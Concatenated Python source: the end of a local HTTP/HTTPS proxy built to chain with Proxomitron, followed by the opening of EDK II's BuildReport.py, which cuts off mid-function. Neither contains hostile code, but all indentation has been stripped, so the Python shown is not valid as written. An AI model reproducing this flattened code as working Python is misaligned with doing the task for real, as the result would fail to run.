self.postdata = self.rfile.read(int(data_length)) if data_length and int(data_length) > 0 else None
if self.command == "POST" and "Content-Length" not in self.headers:
buffer = self.rfile.read()
if buffer:
logger.warning("%03d " % self.reqNum + Fore.RED +
'POST w/o "Content-Length" header (Bytes: %d | Transfer-Encoding: %s | HTTPS: %s',
len(buffer), "Transfer-Encoding" in self.headers, self.ssltunnel)
# Remove hop-by-hop headers
self.purge_headers(self.headers)
r = None
# Below code in connectionpool.py expect the headers to has a copy() and update() method
# That's why we can't use self.headers directly when call pool.urlopen()
#
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
# if self.scheme == 'http':
# headers = headers.copy()
# headers.update(self.proxy_headers)
headers = urllib3._collections.HTTPHeaderDict(self.headers)
try:
# Sometimes 302 redirect would fail with "BadStatusLine" exception, and IE11 doesn't restart the request.
# retries=1 instead of retries=False fixes it.
#! Retry may cause the requests with the same reqNum appear in the log window
r = pool.urlopen(self.command, url, body=self.postdata, headers=headers,
retries=1, redirect=False, preload_content=False, decode_content=False)
if not self.ssltunnel:
if self.bypass:
prefix = '[BP]' if self.proxy else '[BD]'
else:
prefix = '[D]'
if self.command in ("GET", "HEAD"):
logger.info("%03d " % self.reqNum + Fore.MAGENTA + '%s "%s %s" %s %s' %
(prefix, self.command, url, r.status, r.getheader('Content-Length', '-')))
else:
logger.info("%03d " % self.reqNum + Fore.MAGENTA + '%s "%s %s %s" %s %s' %
(prefix, self.command, url, data_length, r.status, r.getheader('Content-Length', '-')))
self.send_response_only(r.status, r.reason)
# HTTPResponse.msg is easier to handle than urllib3._collections.HTTPHeaderDict
r.headers = r._original_response.msg
self.purge_write_headers(r.headers)
if self.command == 'HEAD' or r.status in (100, 101, 204, 304) or r.getheader("Content-Length") == '0':
written = None
else:
written = self.stream_to_client(r)
if "Content-Length" not in r.headers and 'Transfer-Encoding' not in r.headers:
self.close_connection = 1
# Intend to catch regular http and bypass http/https requests exceptions
# Regular https request exceptions should be handled by rear server
except urllib3.exceptions.TimeoutError as e:
self.sendout_error(url, 504, message="Timeout", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[F] %s on "%s %s"', e, self.command, url)
except (urllib3.exceptions.HTTPError,) as e:
self.sendout_error(url, 502, message="HTTPError", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[F] %s on "%s %s"', e, self.command, url)
finally:
if r:
# Release the connection back into the pool
r.release_conn()
do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = do_METHOD
class RearRequestHandler(ProxyRequestHandler):
"""
Supposed to be the parent proxy for Proxomitron for tagged requests
Convert http request to https
"""
server_version = "%s RearProxy/%s" % (_name, __version__)
def do_METHOD(self):
"Convert http request to https"
if self.headers.get("Tagged") and self.headers["Tagged"].startswith(_name):
self.reqNum = int(self.headers["Tagged"].split(":")[1])
# Remove the tag
del self.headers["Tagged"]
else:
self.sendout_error(self.path, 400,
explain="The proxy setting of the client is misconfigured.\n\n" +
"Please set the HTTPS proxy port to %s " % config.FRONTPORT +
"and check the Docs for other settings.")
logger.error(Fore.RED + Style.BRIGHT + "[Misconfigured HTTPS proxy port] " + self.path)
return
# request line: GET http://somehost.com/path?attr=value HTTP/1.1
url = "https" + self.path[4:]
self.host = urlparse(self.path).hostname
proxy, pool, noverify = pools.getpool(self.host)
prefix = '[P]' if proxy else '[D]'
data_length = self.headers.get("Content-Length")
self.postdata = self.rfile.read(int(data_length)) if data_length else None
self.purge_headers(self.headers)
r = None
# Below code in connectionpool.py expect the headers to has a copy() and update() method
# That's why we can't use self.headers directly when call pool.urlopen()
#
# Merge the proxy headers. Only do this in HTTP. We have to copy the
# headers dict so we can safely change it without those changes being
# reflected in anyone else's copy.
# if self.scheme == 'http':
# headers = headers.copy()
# headers.update(self.proxy_headers)
headers = urllib3._collections.HTTPHeaderDict(self.headers)
try:
r = pool.urlopen(self.command, url, body=self.postdata, headers=headers,
retries=1, redirect=False, preload_content=False, decode_content=False)
if proxy:
logger.debug('Using Proxy - %s' % proxy)
color = Fore.RED if noverify else Fore.GREEN
if self.command in ("GET", "HEAD"):
logger.info("%03d " % self.reqNum + color + '%s "%s %s" %s %s' %
(prefix, self.command, url, r.status, r.getheader('Content-Length', '-')))
else:
logger.info("%03d " % self.reqNum + color + '%s "%s %s %s" %s %s' %
(prefix, self.command, url, data_length, r.status, r.getheader('Content-Length', '-')))
self.send_response_only(r.status, r.reason)
# HTTPResponse.msg is easier to handle than urllib3._collections.HTTPHeaderDict
r.headers = r._original_response.msg
self.purge_write_headers(r.headers)
if self.command == 'HEAD' or r.status in (100, 101, 204, 304) or r.getheader("Content-Length") == '0':
written = None
else:
written = self.stream_to_client(r)
if "Content-Length" not in r.headers and 'Transfer-Encoding' not in r.headers:
self.close_connection = 1
except urllib3.exceptions.SSLError as e:
self.sendout_error(url, 417, message="SSL Certificate Failed", explain=e)
logger.error("%03d " % self.reqNum + Fore.RED + Style.BRIGHT + "[SSL Certificate Error] " + url)
except urllib3.exceptions.TimeoutError as e:
self.sendout_error(url, 504, message="Timeout", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[R]%s "%s %s" %s', prefix, self.command, url, e)
except (urllib3.exceptions.HTTPError,) as e:
self.sendout_error(url, 502, message="HTTPError", explain=e)
logger.warning("%03d " % self.reqNum + Fore.YELLOW + '[R]%s "%s %s" %s', prefix, self.command, url, e)
finally:
if r:
# Release the connection back into the pool
r.release_conn()
do_GET = do_POST = do_HEAD = do_PUT = do_DELETE = do_OPTIONS = do_METHOD
"""
#Information#
* Python default ciphers: http://bugs.python.org/issue20995
* SSL Cipher Suite Details of Your Browser: https://cc.dcsec.uni-hannover.de/
* https://wiki.mozilla.org/Security/Server_Side_TLS
"""
try:
if os.name == 'nt':
import ctypes
ctypes.windll.kernel32.SetConsoleTitleW('%s %s' % (_name, __version__))
config = LoadConfig(CONFIG)
logger = logging.getLogger(__name__)
logger.setLevel(getattr(logging, config.LOGLEVEL, logging.INFO))
handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(message)s', datefmt='[%H:%M]')
handler.setFormatter(formatter)
logger.addHandler(handler)
pools = ConnectionPools(CONFIG)
proxpool = urllib3.ProxyManager(config.PROXADDR, num_pools=10, maxsize=8,
# A little longer than timeout of rear pool
# to avoid trigger front server exception handler
timeout=urllib3.util.timeout.Timeout(connect=90.0, read=310.0))
frontserver = FrontServer(('', config.FRONTPORT), FrontRequestHandler)
rearserver = RearServer(('', config.REARPORT), RearRequestHandler)
for worker in (frontserver.serve_forever, rearserver.serve_forever,
pools.reloadConfig):
thread = threading.Thread(target=worker)
thread.daemon = True
thread.start()
print("=" * 76)
print('%s %s (urllib3/%s)' % (_name, __version__, urllib3.__version__))
print()
print(' FrontServer : localhost:%s' % config.FRONTPORT)
print(' RearServer : localhost:%s' % config.REARPORT)
print(' ParentServer : %s' % config.DEFAULTPROXY)
print(' Proxomitron : ' + config.PROXADDR)
print("=" * 76)
while True:
time.sleep(1)
except KeyboardInterrupt:
print("Quitting...")
|
BuildReport.py | ## @file
# Routines for generating build report.
#
# This module contains the functionality to generate build report after
# build all target completes successfully.
#
# Copyright (c) 2010 - 2018, Intel Corporation. All rights reserved.<BR>
# This program and the accompanying materials
# are licensed and made available under the terms and conditions of the BSD License
# which accompanies this distribution. The full text of the license may be found at
# http://opensource.org/licenses/bsd-license.php
#
# THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS,
# WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED.
#
## Import Modules
#
import Common.LongFilePathOs as os
import re
import platform
import textwrap
import traceback
import sys
import time
import struct
import hashlib
import subprocess
import threading
from datetime import datetime
from io import StringIO
from Common import EdkLogger
from Common.Misc import SaveFileOnChange
from Common.Misc import GuidStructureByteArrayToGuidString
from Common.Misc import GuidStructureStringToGuidString
from Common.BuildToolError import FILE_WRITE_FAILURE
from Common.BuildToolError import CODE_ERROR
from Common.BuildToolError import COMMAND_FAILURE
from Common.BuildToolError import FORMAT_INVALID
from Common.LongFilePathSupport import OpenLongFilePath as open
from Common.MultipleWorkspace import MultipleWorkspace as mws
import Common.GlobalData as GlobalData
from AutoGen.AutoGen import ModuleAutoGen
from Common.Misc import PathClass
from Common.StringUtils import NormPath
from Common.DataType import *
import collections
from Common.Expression import *
## Pattern to extract contents in EDK DXS files
gDxsDependencyPattern = re.compile(r"DEPENDENCY_START(.+)DEPENDENCY_END", re.DOTALL)
## Pattern to find total FV total size, occupied size in flash report intermediate file
gFvTotalSizePattern = re.compile(r"EFI_FV_TOTAL_SIZE = (0x[0-9a-fA-F]+)")
gFvTakenSizePattern = re.compile(r"EFI_FV_TAKEN_SIZE = (0x[0-9a-fA-F]+)")
## Pattern to find module size and time stamp in module summary report intermediate file
gModuleSizePattern = re.compile(r"MODULE_SIZE = (\d+)")
gTimeStampPattern = re.compile(r"TIME_STAMP = (\d+)")
## Pattern to find GUID value in flash description files
gPcdGuidPattern = re.compile(r"PCD\((\w+)[.](\w+)\)")
## Pattern to collect offset, GUID value pair in the flash report intermediate file
gOffsetGuidPattern = re.compile(r"(0x[0-9A-Fa-f]+) ([-A-Fa-f0-9]+)")
## Pattern to find module base address and entry point in fixed flash map file
gModulePattern = r"\n[-\w]+\s*\(([^,]+),\s*BaseAddress=%(Address)s,\s*EntryPoint=%(Address)s\)\s*\(GUID=([-0-9A-Fa-f]+)[^)]*\)"
gMapFileItemPattern = re.compile(gModulePattern % {"Address" : "(-?0[xX][0-9A-Fa-f]+)"})
## Pattern to find all module referenced header files in source files
gIncludePattern = re.compile(r'#include\s*["<]([^">]+)[">]')
gIncludePattern2 = re.compile(r"#include\s+EFI_([A-Z_]+)\s*[(]\s*(\w+)\s*[)]")
## Pattern to find the entry point for EDK module using EDKII Glue library
gGlueLibEntryPoint = re.compile(r"__EDKII_GLUE_MODULE_ENTRY_POINT__\s*=\s*(\w+)")
## Tags for MaxLength of line in report
gLineMaxLength = 120
## Tags for end of line in report
gEndOfLine = "\n"
## Tags for section start, end and separator
gSectionStart = ">" + "=" * (gLineMaxLength - 2) + "<"
gSectionEnd = "<" + "=" * (gLineMaxLength - 2) + ">" + "\n"
gSectionSep = "=" * gLineMaxLength
## Tags for subsection start, end and separator
gSubSectionStart = ">" + "-" * (gLineMaxLength - 2) + "<"
gSubSectionEnd = "<" + "-" * (gLineMaxLength - 2) + ">"
gSubSectionSep = "-" * gLineMaxLength
## The look up table to map PCD type to pair of report display type and DEC type
gPcdTypeMap = {
TAB_PCDS_FIXED_AT_BUILD : ('FIXED', TAB_PCDS_FIXED_AT_BUILD),
TAB_PCDS_PATCHABLE_IN_MODULE: ('PATCH', TAB_PCDS_PATCHABLE_IN_MODULE),
TAB_PCDS_FEATURE_FLAG : ('FLAG', TAB_PCDS_FEATURE_FLAG),
TAB_PCDS_DYNAMIC : ('DYN', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_HII : ('DYNHII', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_VPD : ('DYNVPD', TAB_PCDS_DYNAMIC),
TAB_PCDS_DYNAMIC_EX : ('DEX', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_HII : ('DEXHII', TAB_PCDS_DYNAMIC_EX),
TAB_PCDS_DYNAMIC_EX_VPD : ('DEXVPD', TAB_PCDS_DYNAMIC_EX),
}
## The look up table to map module type to driver type
gDriverTypeMap = {
SUP_MODULE_SEC : '0x3 (SECURITY_CORE)',
SUP_MODULE_PEI_CORE : '0x4 (PEI_CORE)',
SUP_MODULE_PEIM : '0x6 (PEIM)',
SUP_MODULE_DXE_CORE : '0x5 (DXE_CORE)',
SUP_MODULE_DXE_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SAL_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_SMM_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_DXE_RUNTIME_DRIVER: '0x7 (DRIVER)',
SUP_MODULE_UEFI_DRIVER : '0x7 (DRIVER)',
SUP_MODULE_UEFI_APPLICATION : '0x9 (APPLICATION)',
SUP_MODULE_SMM_CORE : '0xD (SMM_CORE)',
'SMM_DRIVER' : '0xA (SMM)', # Extension of module type to support PI 1.1 SMM drivers
SUP_MODULE_MM_STANDALONE : '0xE (MM_STANDALONE)',
SUP_MODULE_MM_CORE_STANDALONE : '0xF (MM_CORE_STANDALONE)'
}
## The look up table of the supported opcode in the dependency expression binaries
gOpCodeList = ["BEFORE", "AFTER", "PUSH", "AND", "OR", "NOT", "TRUE", "FALSE", "END", "SOR"]
##
# Writes a string to the file object.
#
# This function writes a string to the file object and a new line is appended
# afterwards. It may optionally wraps the string for better readability.
#
# @File The file object to write
# @String The string to be written to the file
# @Wrapper Indicates whether to wrap the string
#
def FileWrite(File, String, Wrapper=False):
if Wrapper:
String = textwrap.fill(String, 120)
File.write(String + gEndOfLine)
def ByteArrayForamt(Value):
IsByteArray = False
SplitNum = 16
ArrayList = []
if Value.startswith('{') and Value.endswith('}'):
Value = Value[1:-1]
ValueList = Value.split(',')
if len(ValueList) >= SplitNum:
IsByteArray = True
if IsByteArray:
if ValueList:
Len = len(ValueList)/SplitNum
for i, element in enumerate(ValueList):
ValueList[i] = '0x%02X' % int(element.strip(), 16)
if Len:
Id = 0
while (Id <= Len):
End = min(SplitNum*(Id+1), len(ValueList))
Str = ','.join(ValueList[SplitNum*Id : End])
if End == len(ValueList):
Str += '}'
ArrayList.append(Str)
break
else:
Str += ','
ArrayList.append(Str)
Id += 1
else:
ArrayList = [Value + '}']
return IsByteArray, ArrayList
##
# Find all the header file that the module source directly includes.
#
# This function scans source code to find all header files the module may
# include. This is not accurate but very effective to find all the header
# file the module might include with #include statement.
#
# @Source The source file name
# @IncludePathList The list of include path to find the source file.
# @IncludeFiles The dictionary of current found include files.
#
def FindIncludeFiles(Source, IncludePathList, IncludeFiles):
FileContents = open(Source).read()
#
# Find header files with pattern #include "XXX.h" or #include <XXX.h>
#
for Match in gIncludePattern.finditer(FileContents):
FileName = Match.group(1).strip()
for Dir in [os.path.dirname(Source)] + IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
#
# Find header files with pattern like #include EFI_PPI_CONSUMER(XXX)
#
for Match in gIncludePattern2.finditer(FileContents):
Key = Match.group(2)
Type = Match.group(1)
if "ARCH_PROTOCOL" in Type:
FileName = "ArchProtocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PROTOCOL" in Type:
FileName = "Protocol/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif "PPI" in Type:
FileName = "Ppi/%(Key)s/%(Key)s.h" % {"Key" : Key}
elif TAB_GUID in Type:
FileName = "Guid/%(Key)s/%(Key)s.h" % {"Key" : Key}
else:
continue
for Dir in IncludePathList:
FullFileName = os.path.normpath(os.path.join(Dir, FileName))
if os.path.exists(FullFileName):
IncludeFiles[FullFileName.lower().replace("\\", "/")] = FullFileName
break
## Split each lines in file
#
# This method is used to split the lines in file to make the length of each line
# less than MaxLength.
#
# @param Content The content of file
# @param MaxLength The Max Length of the line
#
def FileLinesSplit(Content=None, MaxLength=None):
ContentList = Content.split(TAB_LINE_BREAK)
NewContent = ''
NewContentList = []
for Line in ContentList:
while len(Line.rstrip()) > MaxLength:
LineSpaceIndex = Line.rfind(TAB_SPACE_SPLIT, 0, MaxLength)
LineSlashIndex = Line.rfind(TAB_SLASH, 0, MaxLength)
LineBackSlashIndex = Line.rfind(TAB_BACK_SLASH, 0, MaxLength)
if max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex) > 0:
LineBreakIndex = max(LineSpaceIndex, LineSlashIndex, LineBackSlashIndex)
else:
LineBreakIndex = MaxLength
NewContentList.append(Line[:LineBreakIndex])
Line = Line[LineBreakIndex:]
if Line:
NewContentList.append(Line)
for NewLine in NewContentList:
NewContent += NewLine + TAB_LINE_BREAK
NewContent = NewContent.replace(TAB_LINE_BREAK, gEndOfLine).replace('\r\r\n', gEndOfLine)
return NewContent
##
# Parse binary dependency expression section
#
# This utility class parses the dependency expression section and translate the readable
# GUID name and value.
#
class DepexParser(object):
##
# Constructor function for class DepexParser
#
# This constructor function collect GUID values so that the readable
# GUID name can be translated.
#
# @param self The object pointer
# @param Wa Workspace context information
#
def __init__(self, Wa):
self._GuidDb = {}
for Pa in Wa.AutoGenObjectList:
for Package in Pa.PackageList:
for Protocol in Package.Protocols:
GuidValue = GuidStructureStringToGuidString(Package.Protocols[Protocol])
self._GuidDb[GuidValue.upper()] = Protocol
for Ppi in Package.Ppis:
GuidValue = GuidStructureStringToGuidString(Package.Ppis[Ppi])
self._GuidDb[GuidValue.upper()] = Ppi
for Guid in Package.Guids:
GuidValue = GuidStructureStringToGuidString(Package.Guids[Guid])
self._GuidDb[GuidValue.upper()] = Guid
for Ma in Pa.ModuleAutoGenList:
for Pcd in Ma.FixedVoidTypePcds:
PcdValue = Ma.FixedVoidTypePcds[Pcd]
if len(PcdValue.split(',')) == 16:
GuidValue = GuidStructureByteArrayToGuidString(PcdValue)
self._GuidDb[GuidValue.upper()] = Pcd
##
# Parse the binary dependency expression files.
#
# This function parses the binary dependency expression file and translate it
# to the instruction list.
#
# @param self The object pointer
# @param DepexFileName The file name of binary dependency expression file.
#
def ParseDepexFile(self, DepexFileName):
DepexFile = open(DepexFileName, "rb")
DepexStatement = []
OpCode = DepexFile.read(1)
while OpCode:
Statement = gOpCodeList[struct.unpack("B", OpCode)[0]]
if Statement in ["BEFORE", "AFTER", "PUSH"]:
GuidValue = "%08X-%04X-%04X-%02X%02X-%02X%02X%02X%02X%02X%02X" % \
struct.unpack(PACK_PATTERN_GUID, DepexFile.read(16))
GuidString = self._GuidDb.get(GuidValue, GuidValue)
Statement = "%s %s" % (Statement, GuidString)
DepexStatement.append(Statement)
OpCode = DepexFile.read(1)
return DepexStatement
##
# Reports library information
#
# This class reports the module library subsection in the build report file.
#
class LibraryReport(object):
##
# Constructor function for class LibraryReport
#
# This constructor function generates LibraryReport object for
# a module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.LibraryList = []
if int(str(M.AutoGenVersion), 0) >= 0x00010005:
self._EdkIIModule = True
else:
self._EdkIIModule = False
for Lib in M.DependentLibraryList:
LibInfPath = str(Lib)
LibClassList = Lib.LibraryClass[0].LibraryClass
LibConstructorList = Lib.ConstructorList
LibDesstructorList = Lib.DestructorList
LibDepexList = Lib.DepexExpression[M.Arch, M.ModuleType]
for LibAutoGen in M.LibraryAutoGenList:
if LibInfPath == LibAutoGen.MetaFile.Path:
LibTime = LibAutoGen.BuildTime
break
self.LibraryList.append((LibInfPath, LibClassList, LibConstructorList, LibDesstructorList, LibDepexList, LibTime))
##
# Generate report for module library information
#
# This function generates report for the module library.
# If the module is EDKII style one, the additional library class, library
# constructor/destructor and dependency expression may also be reported.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
if len(self.LibraryList) > 0:
FileWrite(File, gSubSectionStart)
FileWrite(File, TAB_BRG_LIBRARY)
FileWrite(File, gSubSectionSep)
for LibraryItem in self.LibraryList:
LibInfPath = LibraryItem[0]
FileWrite(File, LibInfPath)
#
# Report library class, library constructor and destructor for
# EDKII style module.
#
if self._EdkIIModule:
LibClass = LibraryItem[1]
EdkIILibInfo = ""
LibConstructor = " ".join(LibraryItem[2])
if LibConstructor:
EdkIILibInfo += " C = " + LibConstructor
LibDestructor = " ".join(LibraryItem[3])
if LibDestructor:
EdkIILibInfo += " D = " + LibDestructor
LibDepex = " ".join(LibraryItem[4])
if LibDepex:
EdkIILibInfo += " Depex = " + LibDepex
if LibraryItem[5]:
EdkIILibInfo += " Time = " + LibraryItem[5]
if EdkIILibInfo:
FileWrite(File, "{%s: %s}" % (LibClass, EdkIILibInfo))
else:
FileWrite(File, "{%s}" % LibClass)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module dependency expression subsection in the build report file.
#
class DepexReport(object):
##
# Constructor function for class DepexReport
#
# This constructor function generates DepexReport object for
# a module. If the module source contains the DXS file (usually EDK
# style module), it uses the dependency in DXS file; otherwise,
# it uses the dependency expression from its own INF [Depex] section
# and then merges with the ones from its dependent library INF.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
self.Depex = ""
self._DepexFileName = os.path.join(M.BuildDir, "OUTPUT", M.Module.BaseName + ".depex")
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
if ModuleType in [SUP_MODULE_SEC, SUP_MODULE_PEI_CORE, SUP_MODULE_DXE_CORE, SUP_MODULE_SMM_CORE, SUP_MODULE_MM_CORE_STANDALONE, SUP_MODULE_UEFI_APPLICATION]:
return
for Source in M.SourceFileList:
if os.path.splitext(Source.Path)[1].lower() == ".dxs":
Match = gDxsDependencyPattern.search(open(Source.Path).read())
if Match:
self.Depex = Match.group(1).strip()
self.Source = "DXS"
break
else:
self.Depex = M.DepexExpressionDict.get(M.ModuleType, "")
self.ModuleDepex = " ".join(M.Module.DepexExpression[M.Arch, M.ModuleType])
if not self.ModuleDepex:
self.ModuleDepex = "(None)"
LibDepexList = []
for Lib in M.DependentLibraryList:
LibDepex = " ".join(Lib.DepexExpression[M.Arch, M.ModuleType]).strip()
if LibDepex != "":
LibDepexList.append("(" + LibDepex + ")")
self.LibraryDepex = " AND ".join(LibDepexList)
if not self.LibraryDepex:
self.LibraryDepex = "(None)"
self.Source = "INF"
##
# Generate report for module dependency expression information
#
# This function generates report for the module dependency expression.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalDepexParser The platform global Dependency expression parser object
#
def GenerateReport(self, File, GlobalDepexParser):
if not self.Depex:
return
FileWrite(File, gSubSectionStart)
if os.path.isfile(self._DepexFileName):
try:
DepexStatements = GlobalDepexParser.ParseDepexFile(self._DepexFileName)
FileWrite(File, "Final Dependency Expression (DEPEX) Instructions")
for DepexStatement in DepexStatements:
FileWrite(File, " %s" % DepexStatement)
FileWrite(File, gSubSectionSep)
except:
EdkLogger.warn(None, "Dependency expression file is corrupted", self._DepexFileName)
FileWrite(File, "Dependency Expression (DEPEX) from %s" % self.Source)
if self.Source == "INF":
FileWrite(File, self.Depex, True)
FileWrite(File, gSubSectionSep)
FileWrite(File, "From Module INF: %s" % self.ModuleDepex, True)
FileWrite(File, "From Library INF: %s" % self.LibraryDepex, True)
else:
FileWrite(File, self.Depex)
FileWrite(File, gSubSectionEnd)
##
# Reports dependency expression information
#
# This class reports the module build flags subsection in the build report file.
#
class BuildFlagsReport(object):
##
# Constructor function for class BuildFlagsReport
#
# This constructor function generates BuildFlagsReport object for
# a module. It reports the build tool chain tag and all relevant
# build flags to build the module.
#
# @param self The object pointer
# @param M Module context information
#
def __init__(self, M):
BuildOptions = {}
#
# Add build flags according to source file extension so that
# irrelevant ones can be filtered out.
#
for Source in M.SourceFileList:
Ext = os.path.splitext(Source.File)[1].lower()
if Ext in [".c", ".cc", ".cpp"]:
BuildOptions["CC"] = 1
elif Ext in [".s", ".asm"]:
BuildOptions["PP"] = 1
BuildOptions["ASM"] = 1
elif Ext in [".vfr"]:
BuildOptions["VFRPP"] = 1
BuildOptions["VFR"] = 1
elif Ext in [".dxs"]:
BuildOptions["APP"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asl"]:
BuildOptions["ASLPP"] = 1
BuildOptions["ASL"] = 1
elif Ext in [".aslc"]:
BuildOptions["ASLCC"] = 1
BuildOptions["ASLDLINK"] = 1
BuildOptions["CC"] = 1
elif Ext in [".asm16"]:
BuildOptions["ASMLINK"] = 1
BuildOptions["SLINK"] = 1
BuildOptions["DLINK"] = 1
#
# Save module build flags.
#
self.ToolChainTag = M.ToolChain
self.BuildFlags = {}
for Tool in BuildOptions:
self.BuildFlags[Tool + "_FLAGS"] = M.BuildOption.get(Tool, {}).get("FLAGS", "")
##
# Generate report for module build flags information
#
# This function generates report for the module build flags expression.
#
# @param self The object pointer
# @param File The file object for report
#
def GenerateReport(self, File):
FileWrite(File, gSubSectionStart)
FileWrite(File, "Build Flags")
FileWrite(File, "Tool Chain Tag: %s" % self.ToolChainTag)
for Tool in self.BuildFlags:
FileWrite(File, gSubSectionSep)
FileWrite(File, "%s = %s" % (Tool, self.BuildFlags[Tool]), True)
FileWrite(File, gSubSectionEnd)
##
# Reports individual module information
#
# This class reports the module section in the build report file.
# It comprises of module summary, module PCD, library, dependency expression,
# build flags sections.
#
class ModuleReport(object):
##
# Constructor function for class ModuleReport
#
# This constructor function generates ModuleReport object for
# a separate module in a platform build.
#
# @param self The object pointer
# @param M Module context information
# @param ReportType The kind of report items in the final report file
#
def __init__(self, M, ReportType):
self.ModuleName = M.Module.BaseName
self.ModuleInfPath = M.MetaFile.File
self.FileGuid = M.Guid
self.Size = 0
self.BuildTimeStamp = None
self.Hash = 0
self.DriverType = ""
if not M.IsLibrary:
ModuleType = M.ModuleType
if not ModuleType:
ModuleType = COMPONENT_TO_MODULE_MAP_DICT.get(M.ComponentType, "")
#
# If a module complies to PI 1.1, promote Module type to "SMM_DRIVER"
#
if ModuleType == SUP_MODULE_DXE_SMM_DRIVER:
PiSpec = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "0x00010000")
if int(PiSpec, 0) >= 0x0001000A:
ModuleType = "SMM_DRIVER"
self.DriverType = gDriverTypeMap.get(ModuleType, "0x2 (FREE_FORM)")
self.UefiSpecVersion = M.Module.Specification.get("UEFI_SPECIFICATION_VERSION", "")
self.PiSpecVersion = M.Module.Specification.get("PI_SPECIFICATION_VERSION", "")
self.PciDeviceId = M.Module.Defines.get("PCI_DEVICE_ID", "")
self.PciVendorId = M.Module.Defines.get("PCI_VENDOR_ID", "")
self.PciClassCode = M.Module.Defines.get("PCI_CLASS_CODE", "")
self.BuildTime = M.BuildTime
self._BuildDir = M.BuildDir
self.ModulePcdSet = {}
if "PCD" in ReportType:
#
# Collect all module used PCD set: module INF referenced directly or indirectly.
# It also saves module INF default values of them in case they exist.
#
for Pcd in list(M.ModulePcdList) + list(M.LibraryPcdList):
self.ModulePcdSet.setdefault((Pcd.TokenCName, Pcd.TokenSpaceGuidCName, Pcd.Type), (Pcd.InfDefaultValue, Pcd.DefaultValue))
self.LibraryReport = None
if "LIBRARY" in ReportType:
self.LibraryReport = LibraryReport(M)
self.DepexReport = None
if "DEPEX" in ReportType:
self.DepexReport = DepexReport(M)
if "BUILD_FLAGS" in ReportType:
self.BuildFlagsReport = BuildFlagsReport(M)
##
# Generate report for module information
#
# This function generates report for separate module expression
# in a platform build.
#
# @param self The object pointer
# @param File The file object for report
# @param GlobalPcdReport The platform global PCD report object
# @param GlobalPredictionReport The platform global Prediction report object
# @param GlobalDepexParser The platform global Dependency expression parser object
# @param ReportType The kind of report items in the final report file
#
def GenerateReport(self, File, GlobalPcdReport, GlobalPredictionReport, GlobalDepexParser, ReportType):
FileWrite(File, gSectionStart)
FwReportFileName = os.path.join(self._BuildDir, "DEBUG", self.ModuleName + ".txt")
if os.path.isfile(FwReportFileName):
try:
FileContents = open(FwReportFileName, 'r').read()
Match = gModuleSizePattern.search(FileContents)
if Match:
self.Size = int(Match.group(1))
Match = gTimeStampPattern.search(FileContents)
if Match:
self.BuildTimeStamp = datetime.utcfromtimestamp(int(Match.group(1)))
except IOError:
EdkLogger.warn(None, "Fail to read report file", FwReportFileName)
if "HASH" in ReportType:
OutputDir = os.path.join(self._BuildDir, "OUTPUT")
DefaultEFIfile = os.path.join(OutputDir, self.ModuleName + ".efi")
if os.path.isfile(DefaultEFIfile):
Tempfile = os.path.join(OutputDir, self.ModuleName + "_hash.tmp")
# rebase the efi image since its base address may not zero
cmd = ["GenFw", "--rebase", str(0), "-o", Tempfile, DefaultEFIfile]
try:
PopenObject = subprocess.Popen(' '.join(cmd), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except Exception as X:
EdkLogger.error("GenFw", COMMAND_FAILURE, ExtraData="%s: %s" % (str(X), cmd[0]))
EndOfProcedure = threading.Event()
EndOfProcedure.clear()
if PopenObject.stderr:
StdErrThread = threading.Thread(target=ReadMessage, args=(PopenObject.stderr, EdkLogger.quiet, EndOfProcedure))
StdErrThread.setName("STDERR-Redirector")
StdErrThread.setDaemon(False)
StdErrThread.start()
# waiting for program exit
PopenObject.wait()
if PopenObject.stderr:
StdErrThread.join()
if PopenObject.returncode != 0:
EdkLogger.error("GenFw", COMMAND_FAILURE, "Failed to generate firmware hash image for %s" % (DefaultEFIfile))
if os.path.isfile(Tempfile):
self.Hash = hashlib.sha1()
buf = open(Tempfile, 'rb').read()
if self.Hash.update(buf):
self.Hash = self.Hash.update(buf)
self.Hash = self.Hash.hexdigest()
os.remove(Tempfile)
FileWrite(File, "Module Summary")
FileWrite(File, "Module Name: %s" % self.ModuleName)
FileWrite(File, "Module INF Path: %s" % self.ModuleInfPath)
FileWrite(File, "File GUID: %s" % self.FileGuid)
if self.Size:
FileWrite(File, "Size: 0x%X (%.2fK)" % (self.Size, self.Size / 1024.0))
if self.Hash:
FileWrite(File, "SHA1 HASH: %s *%s" % (self.Hash, self.ModuleName + ".efi"))
if self.BuildTimeStamp:
FileWrite(File, "Build Time Stamp: %s" % self.BuildTimeStamp)
if self.BuildTime:
FileWrite(File, "Module Build Time: %s" % self.BuildTime)
if self.DriverType:
FileWrite(File, "Driver Type: %s" % self.DriverType)
if self.UefiSpecVersion:
